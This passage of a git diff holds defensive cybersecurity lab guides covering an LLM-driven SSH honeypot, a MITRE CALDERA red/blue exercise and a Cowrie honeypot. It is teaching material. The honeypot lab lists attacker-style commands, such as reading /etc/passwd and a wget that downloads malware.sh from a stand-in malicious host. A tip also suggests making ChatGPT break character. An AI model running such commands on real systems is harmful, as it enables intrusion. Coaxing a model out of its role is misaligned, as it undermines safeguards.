+- Go to [ChatGPT](https://chatgpt.com/) and create an account if you don’t have one
+- Make sure you have credits or a payment method at [Billing Setting](https://platform.openai.com/settings/organization/billing/overview)
+- Go to [API Keys](https://platform.openai.com/api-keys) and create a new key
+- Save this key as you will only see it once!
+
+### Deployment
+- Make sure you are into **~/ADCD/beelzebub/**
+
+```bash
+cd ~/ADCD/beelzebub/
+```
+
+```bash
+nano docker-compose.yml
+```
+ - Put your key here at `OPEN_AI_SECRET_KEY: `
+<img width="295" height="53" alt="image" src="https://github.com/user-attachments/assets/eca9345f-c69c-45f2-8a00-5cf389e42b3b" />
+
+
+- Also comment the **Default SSH Mapping**(ssh 22 port) by putting a `#` anywhere before it in the same line
+<img width="176" height="81" alt="image" src="https://github.com/user-attachments/assets/f02190d4-36ec-4638-8817-aae8a33ece43" />
+
+- Save and leave the editor with `Ctrl + X` + `Y` + `Enter`
+
+```bash
+cd configurations/services/
+```
+```bash
+mv ./ssh-22.yaml ~
+```
+```bash
+nano ./ssh-2222.yaml
+```
+ - Add your key with double quotes around it like `OPENAI_API_KEY: "your_api_key_here"`
+
+<img width="329" height="26" alt="image" src="https://github.com/user-attachments/assets/97cf551d-f9c8-4d7a-b575-b423e8c1b74e" />
+
+ - Save and leave the editor with `Ctrl + X` + `Y` + `Enter`
+
+```bash
+cd ~/ADCD/beelzebub/
+```
+```bash
+docker-compose build
+```
+```bash
+docker-compose up -d
+```
+
+# Try it
+Connect to it like this:
+
+```bash
+ssh -p 2222 root@127.0.0.1
+``` 
+- use password "**1234**"
+- Try using any commands like **ls** or **id**
+<img width="659" height="126" alt="image" src="https://github.com/user-attachments/assets/914c1f89-c3d0-412d-bae6-7b9fcee70d9e" />
+
+Everything you see is AI generated, and that's what an attacker would see
+
+Cool, right?
+
+- Try running suspicious commands an attacker would use
+```bash
+uname -a
+```
+```bash
+cat /etc/passwd
+```
+```bash
+wget http://malicious.example/malware.sh
+```
+```bash
+id
+```
+Now exit the session to export the logs
+
+```bash
+cd ~/ADCD/beelzebub/
+```
+```bash
+docker-compose logs -f
+```
+```bash
+docker-compose logs > honeypot.log
+```
+
+Take your time into analyzing the logs and seeing how they are being built
+
+>[!TIP]
+>
+>Try to make ChatGPT break character, this method, like anything else in cybersecurity isn't flawless, but it surely tricks hackers and does its job, **to increase Attack Time**
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/openCanary.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Caldera.md b/IntroClassFiles/Tools/IntroClass/ADHD/Caldera.md
new file mode 100644
index 00000000..a02aa5e4
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Caldera.md
@@ -0,0 +1,250 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# MITRE CALDERA
+
+This lab is designed to be **fully hands-on**, beginner-friendly, and runnable on **one Ubuntu Linux VM** (or any Linux host)
+
+You will install **MITRE CALDERA**, deploy a **Sandcat agent**, run a small **attack operation**, run a simple **defense operation**, and finish with a **cyber deception demo** using a “honeyfile” + alert
+
+---
+
+## In this lab we will
+
+- Log in and verify CALDERA is working
+- Deploy a **Sandcat** agent (on the same machine)
+- Run an **Adversary (red)** operation: basic discovery + collection
+- Run a **Defender (blue)** operation: basic response actions
+- Do a **Cyber Deception** mini-demo:
+  - Create a **honeyfile** with fake “secrets”
+  - Set a simple **file access alert**
+  - Use CALDERA to “touch” the honeyfile and observe the alert
+
+---
+
+## Start the server
+
+On the first boot, use `--build` to build the web UI and plugin assets
+
+```bash
+cd ~/ADCD/caldera/
+```
+
+```bash
+source venv/bin/activate
+```
+
+```bash
+python3 server.py --insecure --build
+```
+
+- Leave this terminal running.
+- You should see log output showing the server is listening.
+
+## Log in to the web UI
+
+Open a browser on the VM (or forward port 8888 via SSH) and go to:
+
+- `http://localhost:8888`
+
+Log in as:
+- Username: `red`
+- Password: `admin`
+
+---
+
+# Part 2 - Deploy a Sandcat agent
+
+The **Sandcat plugin** is CALDERA’s default agent. It can be deployed using the server’s built-in delivery commands or by downloading it from CALDERA
+
+## 1) Download and run the agent
+
+In a new terminal:
+
+```bash
+server="http://localhost:8888"
+```
+
+```bash
+curl -s -X POST -H "file:sandcat.go" -H "platform:linux" "$server/file/download" > sandcat
+```
+
+```bash
+chmod +x sandcat
+```
+
+```bash
+./sandcat -server "$server" -group red -v
+```
+
+You should see the agent running and “beaconing” (calling back to CALDERA)
+
+
+<img width="953" height="401" alt="2026-03-16_12-26" src="https://github.com/user-attachments/assets/3cdcf4e1-5d45-4bf9-9386-58cfd3cb20c2" />
+
+## 2) Confirm the agent shows up in the UI
+
+In the CALDERA web UI:
+- Go to **Agents**
+- You should see a new agent appear (often “trusted” within a minute)
+
+<img width="430" height="319" alt="image" src="https://github.com/user-attachments/assets/b28951c9-621c-4a52-a66d-2ec2477b7f90" />
+
+
+If it doesn’t show:
+- Make sure `python3 server.py ...` is still running
+- Make sure you used `server="http://localhost:8888"` (same as your UI URL)
+
+---
+
+# Part 3 - Run a simple ATT&CK operation (Red / Attack)
+
+CALDERA’s **Stockpile** plugin contains lots of built-in abilities and adversary profiles
+
+We’ll run a simple “Discovery/Collection” style operation
+
+## 1) Pick an adversary profile (easy starter)
+
+In the UI:
+
+- Click on the **"Mountain"** on the top left to get back to the **Start Page**
+
+<img width="224" height="168" alt="image" src="https://github.com/user-attachments/assets/9f1d2533-c4d1-4557-a8ed-c71db8d32494" />
+
+- Go to **Adversaries** and click `Manage Adversaries`
+
+<img width="435" height="342" alt="image" src="https://github.com/user-attachments/assets/49d24f7f-9410-4f44-b604-5ac3d94220e4" />
+
+- Choose one of the built-in “discovery/collection” style adversaries (names vary by version), but for this lab we will use the **Discovery** one, select it
+
+<img width="1692" height="700" alt="image" src="https://github.com/user-attachments/assets/14520373-cd4e-4bbc-935b-85b5af5d079e" />
+
+## 2) Start an operation
+
+In the UI:
+
+- Click on the **"Mountain"** on the top left to get back to the **Start Page**
+
+<img width="224" height="168" alt="image" src="https://github.com/user-attachments/assets/9f1d2533-c4d1-4557-a8ed-c71db8d32494" />
+
+- Go to **Operations** and click `Manage Operations`
+
+<img width="428" height="336" alt="image" src="https://github.com/user-attachments/assets/b18033bc-0454-4a4b-80e4-56f1087d0bf5" />
+
+- Click **New operation**
+
+<img width="151" height="60" alt="image" src="https://github.com/user-attachments/assets/16e007c3-9b21-4d4d-b2e1-be6d11333fbc" />
+
+- Set:
+  - **Operation Name** `Caldera Lab`
+  - **Group:** `red`
+  - **Adversary:** `Discovery`
+
+<img width="805" height="665" alt="image" src="https://github.com/user-attachments/assets/5f3982d8-28a1-4666-a805-3ce9ad85e7cf" />
+
+Start the operation by clicking **Start**
+
+## 3) Watch it run
+
+Click the operation and watch the **links** appear:
+- Each link is an executed step (like “whoami”, “hostname”, “find files”, etc)
+- Click a link to see:
+  - the command sent
+  - the output returned
+
+<img width="1690" height="671" alt="image" src="https://github.com/user-attachments/assets/9009f4bf-d894-4cef-a9e0-6bf0e7077904" />
+
+
+---
+
+# Part 4 - Run a simple Defense operation
+
+CALDERA can also run **defensive actions**
+
+The idea: you can push response actions to endpoints the same way you push adversary actions
+
+## 1) Create a “blue” agent (quick way)
+
+- In the **UI**, press the **Square** under **Running** to stop the operation
+
+<img width="195" height="70" alt="image" src="https://github.com/user-attachments/assets/0bb6d1e3-ec75-4223-989d-fcf8affcd863" />
+
+- Then go to your **Agent Terminal**
+
+- Stop the running agent (**CTRL+C**) and re-run it as group `blue`:
+
+```bash
+./sandcat -server "http://localhost:8888" -group blue -v
+```
+
+Now in the UI:
+
+- Now look at the left tab of actions, scroll down until you see the **Log out** button, click it
+
+<img width="214" height="47" alt="image" src="https://github.com/user-attachments/assets/c2048e0c-95ff-4d36-badd-d4f0a77c5c64" />
+
+Log in as:
+- Username: `blue`
+- Password: `admin`
+
+- Go to **Agents**
+
+<img width="424" height="325" alt="image" src="https://github.com/user-attachments/assets/f91b983a-e600-4dcc-833c-852536a3ea1e" />
+
+- You should see an agent in group **blue**
+
+## 2) Run a basic defender profile
+
+In the UI:
+- Go to **Adversaries** and click `Manage Adversaries`
+
+<img width="435" height="342" alt="image" src="https://github.com/user-attachments/assets/49d24f7f-9410-4f44-b604-5ac3d94220e4" />
+
+- Pick `Incident responder`
+
+- Click on the **"Mountain"** on the top left to get back to the **Start Page**
+
+<img width="224" height="168" alt="image" src="https://github.com/user-attachments/assets/9f1d2533-c4d1-4557-a8ed-c71db8d32494" />
+
+- Go to **Operations** and click `Manage Operations`
+
+<img width="428" height="336" alt="image" src="https://github.com/user-attachments/assets/b18033bc-0454-4a4b-80e4-56f1087d0bf5" />
+
+- Click **New operation**
+
+<img width="151" height="60" alt="image" src="https://github.com/user-attachments/assets/16e007c3-9b21-4d4d-b2e1-be6d11333fbc" />
+
+- Create a new operation:
+  - **Operation Name:** `CalderaBlueLab`
+  - **Group:** `blue`
+  - **Adversary:** `Incident responder`
+  - **Autonomous** `Require manual approval` - we use this to have more control and see in real time everything that happens
+
+<img width="799" height="651" alt="image" src="https://github.com/user-attachments/assets/027fce1f-b055-42f0-a040-4c095e7e2a4e" />
+
+- Start it!
+
+- Now, for every command, we need to approve it
+
+<img width="172" height="92" alt="image" src="https://github.com/user-attachments/assets/6bc315a6-975d-4143-b0b9-477fc836c1e3" />
+
+<br>
+
+<img width="345" height="204" alt="image" src="https://github.com/user-attachments/assets/b64b6357-d8e2-46c6-87ae-e858b284f99c" />
+
+- From here on, you can play with it however you like, EXPERIMENT!!!
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/FileAudit.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/Cowrie.md b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/Cowrie.md
similarity index 59%
rename from IntroClassFiles/Tools/IntroClass/Cowrie.md
rename to IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/Cowrie.md
index 67c0841e..878dfddd 100644
--- a/IntroClassFiles/Tools/IntroClass/Cowrie.md
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/Cowrie.md
@@ -1,326 +1,377 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
-
-Cowrie
-============
-
-Website
--------
-
-<https://github.com/adhdproject/cowrie>
-
-Description
------------
-
-Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and,
-most importantly, the entire shell interaction performed by the attacker.
-
-Cowrie is developed by Michel Oosterhof and is based on Kippo by Upi Tamminen (desaster).
-
-The first thing we need to do is install/start cowrie.
-
-Open a Kali prompt:
-
-![image](https://github.com/user-attachments/assets/1174968b-9c56-485e-8563-054aca72cf60)
-
-Then become root:
-
-`sudo su -`
-
-![image](https://github.com/user-attachments/assets/e0d1da47-9291-40e5-aded-7d0e1deabb75)
-
-Getting cowrie running is really easy if you have docker installed on your system.
-
-All you need to do is run the following:
-
-`docker run -p 2222:2222 cowrie/cowrie`
-
-This will take a few moments.
-
-When it is running you should be able to see the logs like this:
-
-![image](https://github.com/user-attachments/assets/ba63568c-d813-4a84-be63-8462f7683aea)
-
-Now, open another Kali terminal while keeping the first terminal open with the logs open as well:
-
-![image](https://github.com/user-attachments/assets/1174968b-9c56-485e-8563-054aca72cf60)
-
-Let’s delete any other previous ssh known_hosts connections to the honeypot.
-
-This helps reduce any errors from starting and restarting the honeypot.
-
-You should run this command in the /home/kali directory.
-
-`rm .ssh/known_hosts`
-
-![image](https://github.com/user-attachments/assets/a103057f-0f1c-47b5-8e7d-ec8eabadbe53)
-
-
-*The above command is critical because the key fingerprint for Cowrie changes every time you restart it!*
-
-Then, try to connect to the honeypot with the following command:
-
-`ssh -p 2222 root@localhost`
-
-When you get prompted to accept the key fingerprint, type `yes`:
-
-![image](https://github.com/user-attachments/assets/f1a218b7-55ba-475a-9ff2-bf8ea99f372d)
-
-For the password, try `12345`:
-
-![image](https://github.com/user-attachments/assets/2044c147-0a09-46bb-b159-9110cd4fa3fa)
-
-Now, run the following commands:
-
-`id`
-
-`whoami`
-
-`pwd`
-
-`AAAAAAAAAAAAAAAAAAAAAAAAAA`
-
-Notice, the commands and authentication are being tracked in the other terminal with the log info:
-
-![image](https://github.com/user-attachments/assets/33e3cd1c-28a1-4a4c-874e-b9b600e41be8)
-
-Take a few moments and note the results are always the same.  As in, they are the same for all Cowrie instances.
-
-Let's change a few things about our Cowrie honeypot to make it unique.
-
-Did you notice the system name in the prompt?
-
-![image](https://github.com/user-attachments/assets/b3e7d546-1328-42e1-a7a7-db0f094e64aa)
-
-It is the same for all default instalations. Let's change that.
-
-Let’s kill our Cowrie session.  
-
-To do this, click into the Terminal with our log output and press ctrl+c at the same time.
-
-![image](https://github.com/user-attachments/assets/deea16c1-cc94-459e-a2ac-d94d7663f88f)
-
-As we said above, one of the ways that people have been detecting honeypots like Cowrie for years is looking at the key fingerprint and the hostname. 
-
-Because the key fingerprint changes every time you restart Cowrie, we need to next focus on changing the hostname.  To do this we need to change the following file as root on our Kali system:
-
-/var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/etc/cowrie.cfg.dist
-
-Ok, that path is just horrid.  The long number is a unique idea for our Cowrie system.  Apparently, Docker Reaaaaalllly did not collisions.  The overlay2 denotes this a a writeable layer for our container.  
-
-Basically, this means we can edit our Docker container system in this directory.
-
-Let's edit this file.
-
-As root, run the following:
-
-`vim /var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/etc/cowrie.cfg.dist`
-
-
-![image](https://github.com/user-attachments/assets/a87a5e25-a731-4567-ae46-38a340aad32a)
-
-Copy and paste are your friends.
-
-Once in the file, use the down arrow and go to roughly line 30 and change the hostname
-
-![image](https://github.com/user-attachments/assets/36c901de-1a3e-45b1-b24c-3c07666884c5)
-
-To do this in vim, press `a` then make the change.
-
-![image](https://github.com/user-attachments/assets/d3d7a3d4-99e6-48cd-ad07-c20489974802)
-
-When done, hit the following keys in the following order
-
-`esc`
-
-`:`
-
-`wq!`
-
-`return`
-
-
-Now, let's restart and connect:
-
-`docker run -p 2222:2222 cowrie/cowrie`
-
-![image](https://github.com/user-attachments/assets/9390fd7a-7468-44ef-aa70-d52160c6d005)
-
-Then, in another Kali terminal connect with a password of 12345:
-
-`rm .ssh/known_hosts`
-
-`ssh -p 2222 root@localhost`
-
-Then type `yes` on the key fingerprint verification.
-
-![image](https://github.com/user-attachments/assets/485efdb7-7cf9-4ee5-a59a-fc0375db817c)
-
-Your hostname should now be changed.
-
-
-Now, let’s edit the Message of the Day (MOTD).  Because the default one is not fun at all.
-
-
-`vim /var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/honeyfs/etc/motd`
-
-![image](https://github.com/user-attachments/assets/e60c8de7-1026-4507-9e03-fb0718799a4f)
-
-Change it to something better!
-
-![image](https://github.com/user-attachments/assets/a99a4447-c2a7-4eb5-bb6c-0bf2861abf8e)
-
-When done, hit the following keys in the following order
-
-`esc`
-
-`:`
-
-`wq!`
-
-`return`
-
-Now, let's restart and connect:
-
-`docker run -p 2222:2222 cowrie/cowrie`
-
-![image](https://github.com/user-attachments/assets/9390fd7a-7468-44ef-aa70-d52160c6d005)
-
-Then, in another Kali terminal connect with a password of 12345:
-
-`rm .ssh/known_hosts`
-
-`ssh -p 2222 root@localhost`
-
-Then type `yes` on the key fingerprint verification.
-
-![image](https://github.com/user-attachments/assets/485efdb7-7cf9-4ee5-a59a-fc0375db817c)
-
-![image](https://github.com/user-attachments/assets/1a8b732b-2a04-413e-8039-dd7d04ac6360)
-
-
-There!
-
-That is much better!
-
-There is far more than we can change in this short lab.
-
-For a great resource on changing the way Cowrie looks and feels, check out the following site:
-
-https://cryptax.medium.com/customizing-your-cowrie-honeypot-8542c888ca49
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-<!--
-
-THIS SECTION IS BEING REMOVED FOR THE TIME BEING PER JOHN
-
-
-
-Install Location
-----------------
-
-`/opt/cowrie`
-
-Usage
------
-
-Cowrie is incredibly easy to use.
-
-It basically has two parts you need to be aware of:
-
-  * A config file
-  * A launch script
-
-The config file is located at
-
-`/opt/cowrie/etc/cowrie.cfg`
-
-
-Example 1: Running Cowrie
-------------------------
-
-By default Cowrie listens on port 2222 and emulates an ssh server.
-
-To run Cowrie, cd into the Cowrie directory and execute:
-
-`~$` **`cd /opt/cowrie`**
-`~$` **`./bin/cowrie start`**
-
-        Not using Python virtual environment
-        version check
-        Starting cowrie: [twistd   --umask=0022 --pidfile=var/run/cowrie.pid --logger cowrie.python.logfile.logger cowrie ]...
-
-We can confirm Cowrie is listening with Cowrie's own `status` command:
-
-`~$` **`./bin/cowrie status`**
-
-        cowrie is running (PID: 21473).
-
-We can also confirm Cowrie is listening with lsof:
-
-`~$` **`sudo lsof -i -P | grep twistd`**
-
-        twistd  548 adhd    6u  IPv4 523637      0t0  TCP *:2222 (LISTEN)
-
-Looks like we're good.
-
-Example 2: Cowrie In Action
---------------------------
-
-Assuming Cowrie is already running and listening on port 2222, (if not see [Example 1: Running Cowrie]),
- we can now ssh to Cowrie in order to see what an attacker would see.
-
-`~$` **`ssh -p 2222 localhost`**
-
-        The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
-        RSA key fingerprint is 05:68:07:f9:47:79:b8:81:bd:8a:12:75:da:65:f2:d4.
-        Are you sure you want to continue connecting (yes/no)? yes
-        Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
-        Password:
-        Password:
-        Password:
-        adhd@localhost's password:
-        Permission denied, please try again.
-
-It looks like our attempts to authenticate were met with failure.
-
-Example 3: Viewing Cowrie's Logs
--------------------------------
-
-Change into the Cowrie log Directory:
-
-`~$` **`cd /opt/cowrie/var/log/cowrie`**
-
-Now tail the contents of cowrie.log:
-
-`/opt/cowrie/var/log/cowrie$` **`tail cowrie.log`**
-
-        2016-02-17 21:52:12-0700 [-] unauthorized login:
-        2016-02-17 21:54:51-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] adhd trying auth password
-        2016-02-17 21:54:51-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] login attempt [adhd/asdf] failed
-        2016-02-17 21:54:52-0700 [-] adhd failed auth password
-        2016-02-17 21:54:52-0700 [-] unauthorized login:
-        2016-02-17 21:54:53-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] adhd trying auth password
-        2016-02-17 21:54:53-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] login attempt [adhd/adhd] failed
-        2016-02-17 21:54:54-0700 [-] adhd failed auth password
-        2016-02-17 21:54:54-0700 [-] unauthorized login:
-        2016-02-17 21:54:54-0700 [HoneyPotTransport,0,127.0.0.1] connection lost
-
-Here we can clearly see my login attempts and the username/password combos I employed as I tried
-to gain access in [Example 2: Cowrie In Action].  This could be very useful!
-
-Also, when you get a chance, take a look at the command configuration files in the `/opt/cowrie/honeyfs` directory.
-
-Finally, user accounts for logging into the fake ssh server can be placed in a `/opt/cowrie/etc/userdb.txt` file. This file no longer exists by default, so Cowrie uses credentials specified near the top of `/opt/cowrie/src/cowrie/core/auth.py` by default
-
-An example userdb file can be found in `/opt/cowrie/etc/userdb.example`. Cowrie
-credentials can be specified using patterns. These patterns are explained in the
-example file.
-
-What happens when you log in with one of the valid userID and password combos?
-
-What happens when you exit the session?
-
-What are some solid IOCs that this is a honeypot?
---!>
- 
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Cowrie
+
+# Ubuntu VM
+
+Website
+-------
+
+<https://github.com/adhdproject/cowrie>
+
+Description
+-----------
+
+Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
+
+>[!TIP]
+>
+>Cowrie is developed by <b>Michel Oosterhof</b> and is based on <i>Kippo</i> by <b>Upi Tamminen</b> (desaster).
+
+The first thing we need to do is instal and start Cowrie.
+
+To begin, let's open a terminal. 
+
+Then become root by running the following command:
+
+```bash
+sudo su -
+```
+
+Getting Cowrie running is really easy if you have docker installed on your system.
+
+All you need to do is run the following:
+
+```bash
+docker run -p 2222:2222 cowrie/cowrie
+```
+
+This will take a few moments.
+
+You will see an output like this:
+
+<img width="994" height="408" alt="2026-03-07_11-56" src="https://github.com/user-attachments/assets/2412a478-f227-4992-8a91-c08810057a68" />
+
+
+Once you see **"Ready to accept SSH connections"** in the command output, you are ready to continue.
+
+Open another terminal while keeping the first terminal open with the logs open as well. 
+
+<img width="311" height="52" alt="GetUbuntuTerminalFromUbuntuVM" src="https://github.com/user-attachments/assets/7860eaaa-bb6b-48b8-b5a0-7e1248684363" />
+
+We need to delete any other previous `ssh known_hosts` connections to the honeypot.
+
+This helps reduce any errors from starting and restarting the honeypot.
+
+```bash
+rm ~/.ssh/known_hosts
+```
+
+>[!IMPORTANT]
+>You mgiht not even have any `known_hosts` file, but:
+>
+>The above command is critical because the key fingerprint for Cowrie changes every time you restart it!
+
+Then, try to connect to the honeypot with the following command:
+
+```bash
+ssh -p 2222 root@localhost
+```
+
+When you get prompted to accept the key fingerprint, type `yes`:
+
+<img width="872" height="114" alt="2026-03-07_11-59" src="https://github.com/user-attachments/assets/2289320f-7e10-42dc-8581-59692c9c2a72" />
+
+For the password, try `12345`:
+
+<img width="853" height="330" alt="2026-03-07_12-01" src="https://github.com/user-attachments/assets/1c4657d6-43dc-4f5d-8963-6011b6e09edd" />
+
+Now, run the following commands:
+
+`id`
+
+`whoami`
+
+`pwd`
+
+`AAAAAAAAAAAAAAAAAAAAAAAAAA`
+
+<img width="524" height="242" alt="2026-03-07_12-05" src="https://github.com/user-attachments/assets/6bdb9f45-758c-400f-a68c-935d81daf5e7" />
+
+
+Notice, the commands and authentication are being tracked in the other terminal with the log info:
+
+<img width="1085" height="270" alt="2026-03-07_12-04" src="https://github.com/user-attachments/assets/0b41858f-cfec-4146-b56c-774d87a5c8d2" />
+
+
+Take a few moments and notice that the results are always the same... for all Cowrie instances.
+
+Let's change a few things about our Cowrie honeypot to make it unique.
+
+Did you notice the system name in the prompt?
+
+<img width="756" height="167" alt="2026-03-07_12-06" src="https://github.com/user-attachments/assets/c8b6784e-7f9a-4b1c-821d-0eb0d441df63" />
+
+
+It is the same for all default installations. Let's change that.
+
+First, we need to kill our Cowrie session.  
+
+To do this, click into the first terminal with our log output and press `ctrl + c` at the same time.
+
+<img width="1007" height="138" alt="2026-03-07_12-08" src="https://github.com/user-attachments/assets/d0f242bb-4819-4743-a9a3-1216c8ab339e" />
+
+>[!TIP] 
+>
+>If done correctly, you should see **"Server Shut Down"**
+
+As we said above, one of the ways that people have been detecting honeypots like Cowrie for years is looking at the key fingerprint and the hostname. 
+
+Because the key fingerprint changes every time you restart Cowrie, we need to next focus on changing the hostname. 
+
+To do this we need to change the following file as root on our linux system:
+
+<pre>/var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/etc/cowrie.cfg.dist</pre>
+
+>[!NOTE]
+>
+>This is not a command, just the directory of the file we will be changing.
+
+Ok, that path is just horrid.  The long number is a unique ID for our Cowrie system. Apparently, Docker <i>reaaaaalllly</i> does not like collisions.  
+
+However, `overlay2` denotes this a a writeable layer for our container. Basically, this means we can edit our Docker container system within this directory.
+
+So let's edit this file using `vim`.
+
+As root, run the following:
+
+```bash
+vim /var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/etc/cowrie.cfg.dist
+```
+
+![](/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/vimfileedit.png)
+
+>[!TIP]
+>
+>Copy and paste are your friends!
+
+Once in the file, use the down arrow and go to roughly line 30 and change the hostname
+
+![image](https://github.com/user-attachments/assets/36c901de-1a3e-45b1-b24c-3c07666884c5)
+
+To do this in vim, press `a` then make the change.
+
+![image](https://github.com/user-attachments/assets/d3d7a3d4-99e6-48cd-ad07-c20489974802)
+
+When done, hit the following keys in the following order
+
+`esc`
+
+`:`
+
+`wq!`
+
+`return`
+
+
+Now, let's restart and connect:
+
+```bash
+docker run -p 2222:2222 cowrie/cowrie
+```
+
+![image](https://github.com/user-attachments/assets/9390fd7a-7468-44ef-aa70-d52160c6d005)
+
+Then, in another terminal connect with a password of 12345:
+
+```bash
+rm ~/.ssh/known_hosts
+```
+
+```bash
+ssh -p 2222 root@localhost
+```
+
+Then type `yes` on the key fingerprint verification.
+
+![image](https://github.com/user-attachments/assets/485efdb7-7cf9-4ee5-a59a-fc0375db817c)
+
+Your hostname should now be changed.
+
+
+Now, let’s edit the Message of the Day (MOTD).  Because the default one is not fun at all.
+
+```bash
+vim /var/lib/docker/overlay2/49cb1d1569dac74ee9793c9efb526ae1ba35b8e4a31b14a1a1c8c30bc70dc953/diff/cowrie/cowrie-git/honeyfs/etc/motd
+```
+
+![image](https://github.com/user-attachments/assets/e60c8de7-1026-4507-9e03-fb0718799a4f)
+
+Change it to something better!
+
+![image](https://github.com/user-attachments/assets/a99a4447-c2a7-4eb5-bb6c-0bf2861abf8e)
+
+When done, hit the following keys in the following order
+
+`esc`
+
+`:`
+
+`wq!`
+
+`return`
+
+Now, let's restart and connect:
+
+```bash
+docker run -p 2222:2222 cowrie/cowrie
+```
+
+![image](https://github.com/user-attachments/assets/9390fd7a-7468-44ef-aa70-d52160c6d005)
+
+Then, in another terminal connect with a password of 12345:
+
+```bash
+rm ~/.ssh/known_hosts
+```
+
+```bash
+ssh -p 2222 root@localhost
+```
+
+Then type `yes` on the key fingerprint verification.
+
+![image](https://github.com/user-attachments/assets/485efdb7-7cf9-4ee5-a59a-fc0375db817c)
+
+![image](https://github.com/user-attachments/assets/1a8b732b-2a04-413e-8039-dd7d04ac6360)
+
+
+There!
+
+That is much better!
+
+There is far more than we can change in this short lab.
+
+For a great resource on changing the way Cowrie looks and feels, check out the following site:
+
+https://cryptax.medium.com/customizing-your-cowrie-honeypot-8542c888ca49
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Portspoof/Portspoof.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Spidertrap/Spidertrap.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+<!--
+
+THIS SECTION IS BEING REMOVED FOR THE TIME BEING PER JOHN
+
+
+
+Install Location
+----------------
+
+`/opt/cowrie`
+
+Usage
+-----
+
+Cowrie is incredibly easy to use.
+
+It basically has two parts you need to be aware of:
+
+  * A config file
+  * A launch script
+
+The config file is located at
+
+`/opt/cowrie/etc/cowrie.cfg`
+
+
+Example 1: Running Cowrie
+------------------------
+
+By default Cowrie listens on port 2222 and emulates an ssh server.
+
+To run Cowrie, cd into the Cowrie directory and execute:
+
+`~$` **`cd /opt/cowrie`**
+`~$` **`./bin/cowrie start`**
+
+        Not using Python virtual environment
+        version check
+        Starting cowrie: [twistd   --umask=0022 --pidfile=var/run/cowrie.pid --logger cowrie.python.logfile.logger cowrie ]...
+
+We can confirm Cowrie is listening with Cowrie's own `status` command:
+
+`~$` **`./bin/cowrie status`**
+
+        cowrie is running (PID: 21473).
+
+We can also confirm Cowrie is listening with lsof:
+
+`~$` **`sudo lsof -i -P | grep twistd`**
+
+        twistd  548 adhd    6u  IPv4 523637      0t0  TCP *:2222 (LISTEN)
+
+Looks like we're good.
+
+Example 2: Cowrie In Action
+--------------------------
+
+Assuming Cowrie is already running and listening on port 2222, (if not see [Example 1: Running Cowrie]),
+ we can now ssh to Cowrie in order to see what an attacker would see.
+
+`~$` **`ssh -p 2222 localhost`**
+
+        The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
+        RSA key fingerprint is 05:68:07:f9:47:79:b8:81:bd:8a:12:75:da:65:f2:d4.
+        Are you sure you want to continue connecting (yes/no)? yes
+        Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
+        Password:
+        Password:
+        Password:
+        adhd@localhost's password:
+        Permission denied, please try again.
+
+It looks like our attempts to authenticate were met with failure.
+
+Example 3: Viewing Cowrie's Logs
+-------------------------------
+
